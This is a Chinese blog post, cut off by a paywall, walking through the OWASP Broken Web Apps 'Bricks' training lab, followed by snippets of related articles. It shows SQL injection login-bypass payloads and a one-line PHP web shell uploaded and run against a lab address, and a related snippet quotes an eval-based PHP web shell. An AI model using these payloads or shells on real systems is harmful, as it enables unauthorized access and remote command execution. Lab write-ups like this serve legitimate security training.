owaspbwa之Bricks

最新推荐文章于 2021-12-05 00:38:48 发布
最新推荐文章于 2021-12-05 00:38:48 发布
阅读量2.5k 收藏 3
点赞数
分类专栏: 靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freegotocpp/article/details/86359729
版权
本文详细介绍了OWASP Broken Web Applications (BWA) 的Bricks部分,包括多个登录(Login)漏洞和上传(Upload)漏洞的利用方法,如SQL注入,Burp Suite拦截修改提交来绕过登录和修改MIME类型实现上传。同时,还涉及内容(Content)部分的数据库信息探测、权限提升等攻击手段,如读取系统文件、利用用户信息等。
摘要由CSDN通过智能技术生成

简介

 下载:https://sourceforge.net/projects/owaspbwa/files/

GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide

0x001 login #1

 burp拦截修改提交 检查注入

username=test'&passwd=test'&submit=Submit



#SQL Query: SELECT * FROM users WHERE name='test'' and password='test''

burp拦截修改提交绕过登录

username=test' or 1=1-- -&passwd=test&submit=Submit

0x002 Login #2

和login1一样 绕过登录

username=test' or 1=1-- -&passwd=test&submit=Submit

0x003 Login #3

username=test&passwd=test') or 1=1-- -&submit=Submit

0x004 Login #4

#4 #5 #6  同上注入绕过

0x005 Upload #1

上传webshell.php 根据文件路径http://192.168.1.105/owaspbricks/upload-1/uploads/shell.php?cmd=%20id

cat shell.php 
<?php system($_GET["cmd"]); ?>

0x006 Upload #

最低0.47元/天 解锁文章
zhaji001
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dockerowaspbricks:用于 OWASP Bricks 的 Docker 容器
07-11
Docker OWASP 积木 用于Docker 容器 Bricks 是一个基于 PHP 和 MySQL 构建的 Web 应用程序安全学习平台。 该项目侧重于常见应用程序安全问题的变体。 每个“砖块”都有某种安全问题,可以手动或使用自动化软件工具加以利用。 任务是“打破砖块”,从而学习 Web 应用程序安全的各个方面。 BricksOWASP 为您带来的一个完全免费和开源的项目。 还可以免费访问或下载和。 Bricks 分为三个不同的部分:登录页面、文件上传页面和内容页面。 如何开始 只需运行 docker 容器: docker run -d -P 80:80 citizenstig/owaspbricks 并通过 Web 设置数据库。
owasp bricks_使用Bricks.js创建快速砌体网格布局
cune1359的博客
07-03 350
使用jQuery ,使用插件和来自开发人员的免费教程来创建网格一直非常简单。 但是,砖石网格很难构建,因为它们在页面上分布不均匀 。 您将拥有固定大小的列宽,但是项目的高度可以相差很大 。 要制作像素完美的砖石网格,您需要一个诸如Bricks.js的插件。 这个插件是完全开源的,而且非常快。 即使页面上有数十个项目,它也将在不到半秒的时间内呈现网格 。 自从普及布局以来,大多数...
OWASP Bricks:基于PHP和MySQL构建的Web应用安全学习平台-开源
05-30
Bricks 是一个基于 PHP 和 MySQL 的故意易受攻击的 Web 应用程序。 该项目侧重于常见的应用程序安全漏洞和漏洞利用的变体。 每个“砖块”都有某种可以使用工具(Mantra 和 ZAP)加以利用的漏洞。 任务是“打破砖块”,从而学习 Web 应用程序安全的各个方面。
OWASP各种Login登录
nielilijy的专栏
09-24 5048
这个也是OWASP放出来的一个web安全学习平台,PHP+MySQL,主要有SQL注入练习及简单绕过 官网地址:http://43.247.91.228:83/ Login地址:http://43.247.91.228:83/login-pages.html 1、Login #1 (basic login) 2、Login #2 (JavaScript validation) ...
基于owasp实现文件上传漏洞
M_Young的博客
12-05 679
理论分析: 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。 <?php @eval(S_POST[’pass’]);?> 一句话木马 步骤 首先,
bricks
03-28
"bricks"是一个基于Python的框架,用于构建和操作数据流图。在深入探讨这个框架之前,我们首先需要理解什么是数据流图。数据流图是一种表示算法或系统工作方式的图形表示,它通过节点(代表处理元素)和边(代表数据...
Abandoned Bricks-开源
05-26
《废弃的砖块:开源俄罗斯方块的编程之旅》 "Abandoned Bricks",这个名字在游戏界或许并不显眼,但它却是一个充满创新精神的开源项目。它以经典游戏俄罗斯方块为蓝本,利用SDL(Simple DirectMedia Layer)库,...
Bricks
10-25
"Bricks"是一个与字体相关的项目,从标题和描述中我们可以推测这可能是一个关于设计、图形或者排版的资源包,特别关注的是字体这一视觉元素。在IT行业中,字体不仅关乎美学,它还涉及到用户体验、可读性以及品牌识别...
frontend-bricks
07-24
"前端砖块"(frontend-bricks)是一个与前端开发相关的项目,从标签“JavaScript”我们可以推断,这个项目主要关注的是使用JavaScript进行前端构建。在前端开发中,砖块通常指的是可重用、模块化的代码组件,它们...
Rainbow Bricks-开源
07-20
《Rainbow Bricks:Ruby 开源打砖块游戏的魅力解析》 在当今的软件世界中,开源项目已经成为了创新和技术进步的重要驱动力。"Rainbow Bricks" 是一款基于 Ruby 编程语言开发的开源打砖块游戏,它不仅为玩家提供了一...
OWASP Broken Web Apps VM 1 1 1种子文件
03-02
OWASP Broken Web Apps
webgoat全关教程手册
热门推荐
黑白的博客
11-08 5万+
Webgoat&Webwolf owaspbwa里面的两个服务 搭建 先要安装jdk、Webgoat和Webwolf Webgoat和Webwolf jdk1.8不支持了,需要安装jdk11 去git上下载Webgoat和Webwolf https://github.com/WebGoat/WebGoat/releases/tag/v8.0.0.M26 去oracle官网下载JDK https://www.oracle.com/java/technologies/javase-jdk11-down
OWASPBWA的搭建及简单学习文件上传漏洞
小城的博客
11-08 3298
OWASPBWA的搭建及学习 我直接将我使用的OWASPBWA的链接地址发出来 owasp下载链接:https://jaist.dl.sourceforge.net/project/owaspbwa/1.2/OWASP_Broken_Web_Apps_VM_1.2.7z 将这个链接复制到迅雷下载即可,大概是1.7G,网速快的话很快就下好了。 下载完之后直接解压,然后点击vm右上角的文件直接选择打开这个文件夹即可使用 * * 进入机子后,输入ip a 查看机子的ip地址 得到靶机的地址后,我们可以在浏览器
渗透测试攻防练习实验室 (资源分享,国外在线教程)
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
OWASP WebGoat---安全测试学习笔记(一)
光明矢的专栏
04-13 2万+
OWASP WebGoat---安全测试学习笔记(一)
网络安全攻防的环境配置(owaspbwa
vergilben的学习日记
04-08 2万+
网络安全攻防的环境配置 之前有朋友留言说介绍一下我常用的环境,在学习信息安全的过程中我们需要环境去自己练习,其中web方面的可以用复现漏洞的方式来练习。下面介绍三种自己用的练习方法(第三种较长): 合天网安实验室 最初我开始学习的时候用的就是合天网安实验室,里面的实验偏基础,倾向于让你了解原理,适合小白入门,唯一不足的是价格有点贵,有些实验你要存好长时间的合氏币,在我以前的博客里许多用的是合天...
Web安全渗透OWASP-DVWA文件上传与文件包含漏洞
lx1315998513的博客
10-29 2288
配置环境 下载并启动OWASP Broken Web Apps VM v1.2(注意:网站IP地址由自己具体IP为准) Welcome to the OWASP Broken Web Apps VM !!! This VM has many serious security issues. We strongly recommend that you run it only on the...
OWASP靶机之文件上传漏洞
qq_33894428的博客
12-28 1355
初识OWASP靶机文件上传漏洞LOWMEDIUMHIGH LOW 1.首先找到一张小图片,符合上传文件的大小以及格式; 2.编辑一句话木马文件,将格式改为php; 一句话木马: <?php @eval($_POST['attack']) ;?> 3.将小图片上传至网站中,显示上传成功; 4.将小马上传至网站,上传成功; 5.将小马的路径与当前网站的路径结合并复制,然后使用中国菜刀进行链接; 路径结果: 6.中国菜刀成功链接并能进行文件管理且下载、删除或新建文件。 路径后的小框为一句话
Data Bricks
最新发布
05-24
Data Bricks is a cloud-based data processing platform that provides a collaborative environment for data scientists, analysts, and engineers to work with big data. It offers a unified analytics engine...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值